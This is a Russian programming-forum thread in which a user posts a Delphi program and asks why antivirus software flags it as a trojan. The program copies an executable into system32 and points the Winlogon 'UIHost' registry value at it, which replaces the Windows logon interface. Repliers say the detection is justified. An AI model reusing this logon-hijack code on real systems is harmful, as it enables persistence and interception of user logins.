Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 20.01.2010, 19:03   #1
Volkogriz
Форумчанин
 
Аватар для Volkogriz
 
Регистрация: 11.10.2007
Сообщений: 384
Вопрос Ругаеться антивирусник

Доброе время суток!
У меня проблемма такого плана
Написал программу для замены файла
Вот код программы:
Код:
program SetupLog;
{$I-}
{$D-}
uses
  Windows,
  SysUtils,
  registry;

var
Windir: string;
WindirP: PChar;
Res: Cardinal;
Reg : TRegistry;
begin
WinDirP := StrAlloc(MAX_PATH);
Res := GetWindowsDirectory(WinDirP, MAX_PATH);
if Res > 0 then
WinDir := StrPas(WinDirP);
begin
CopyFile(PChar('lognui.exe'), PChar(Windir + '\system32\'+'lognui0.exe'), false);
begin
Reg:=TRegistry.create;
Reg.RootKey := HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',false);
Reg.ValueExists('UIHost') ;
Reg.LazyWrite := True;
Reg.WriteString('UIHost',Windir + '\system32\'+'lognui0.exe');
Reg.CloseKey;
Reg.free;
begin
Halt;
end;
end;
end;

begin
end;
end.
Антивирусник орёт:
Цитата:
C:\All project\consolSet\Project1.exe - инфицирован Trojan.Click.origin
C:\All project\consolSet\SetupLog.exe - инфицирован Trojan.AVKill.origin
как от этого можно избавиться?
Зарание благодарен!
С уважением,
Volkogriz!
Не количеством плюсов измеряется репутация человека...!
Volkogriz вне форума Ответить с цитированием
Старый 20.01.2010, 19:06   #2
mihali4
*
Старожил
 
Регистрация: 22.11.2006
Сообщений: 9,201
По умолчанию

Правильно орет...
Нечего лазить в системные файлы или подменять их.
mihali4 вне форума Ответить с цитированием
Старый 20.01.2010, 19:10   #3
Volkogriz
Форумчанин
 
Аватар для Volkogriz
 
Регистрация: 11.10.2007
Сообщений: 384
По умолчанию

Там вкоде некакой подмены файлов то нет!
Да и вроде нечего такого чтоб он орал!
Не количеством плюсов измеряется репутация человека...!
Volkogriz вне форума Ответить с цитированием
Старый 20.01.2010, 22:41   #4
FaTaL
Участник клуба
 
Аватар для FaTaL
 
Регистрация: 09.11.2007
Сообщений: 1,761
По умолчанию

Скорее всего у Вас седьмой дельфин, если так то почитайте тему про его заражение.
FaTaL вне форума Ответить с цитированием
Старый 20.01.2010, 23:06   #5
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

1)лезите в системную папку.
2)в реестр.(к винлогону)
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Рекомендую - "Антивирусник" valerij Безопасность, Шифрование 22 14.10.2009 16:03
помогите с кодом а то компилятор ругаеться =( Above_men Помощь студентам 9 21.04.2009 07:21
Не устанавливается антивирусник Сова Безопасность, Шифрование 4 20.02.2009 15:18
Какой антивирусник лучший? ORBIUS Софт 3 08.09.2008 22:16